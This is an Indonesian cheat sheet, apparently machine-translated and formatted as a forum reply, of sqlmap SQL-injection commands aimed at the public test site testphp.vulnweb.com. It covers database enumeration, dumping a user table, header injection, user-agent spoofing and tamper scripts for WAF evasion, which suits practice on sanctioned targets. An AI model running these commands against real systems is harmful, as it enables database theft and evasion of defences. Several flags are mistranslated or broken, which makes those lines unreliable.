Unduh:
[MEMBALAS]
[Tempelkan konten Anda di sini. Hapus baris ini dan satu di bawah!]
[JANGAN MENEMPELKAN KONTEN DI ATAS ATAU DI BAWAH KUTIPAN BALASAN]
1. sqlmap -u http://testphp.vulnweb.com/ --crawl 4 (1-4)
2. sqlmap -u http://testphp.vulnweb.com/ --crawl 4 --batch
3. sqlmap -u http://testphp.vulnweb.com/ --crawl 4 --technique="U" --batch
Atur sesuai keinginan apakah U, B atau lainnya
B: Tirai berbasis Boolean
E: Berdasarkan kesalahan
U: Berdasarkan kueri gabungan
S: Kueri bertumpuk
T: Buta berdasarkan waktu
T: Kueri sebaris
4. sqlmap -u http://testphp.vulnweb.com/ --crawl 4 --batch --threads 10 (1-10)
5.sqlmap -u http://testphp.vulnweb.com/ --crawl 4 --batch --risk 3 (1-3)
6. sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch --level 2 (1-5)
7. sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch -v 4 (1-6)
Verbosit:
0: Hanya tampilkan traceback, kesalahan, dan pesan penting Python.
1: Tampilkan juga informasi dan pesan peringatan.
2: Tampilkan juga pesan debug.
3: Tampilkan juga muatan yang disuntikkan.
4: Tampilkan juga permintaan HTTP.
5: Tampilkan juga editor tanggapan HTTP.
6: Tampilkan juga konten halaman tanggapan HTTP.
8. sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --pengguna-saat-ini --db-saat-ini --nama-host --batch
9. sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
10. sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
11. sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T pengguna --dump
12. sqlmap -u http://testphp.vulnweb.com/ --crawl 3 --headers="Referer:abc.com" -v 4 --batch
Editor injeksi khusus didukung :
–agen-pengguna=”sqlmap*”
–referer="target.com*"
–headers="Agen-Pengguna:uji*\nReferer:bla"
–header="Foo:bar*"
-r permintaan.txt
13. sqlmap -u http://testphp.vulnweb.com/ --crawl 3 --user -agent="GECKO_Chrome" -v 4 --batch (nama palsu untuk melewati firewall)
14. sqlmap -u http://testphp.vulnweb.com/ --crawl 3 --mobile -v 4
15. sqlmap --list-tampers (test apakah mengaktifkan WAF)
sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch --tamper=base64encode -v 3
16. sqlmap -u http://testphp.vulnweb.com/login.php --forms (halaman login)
17. sqlmap -u http://192.168.149.137/admin/userinfo.php --data="uname=abc&pass=123&login=submit" --dbs
18. Proxy jadi sebelum menggunakan aktifkan aplikasi burp suite
sqlmap -u http://testphp.vulnweb.com/ --crawl 3 --pr
oksi="http://127.0.0.1:8080" --batch
[/MEMBALAS]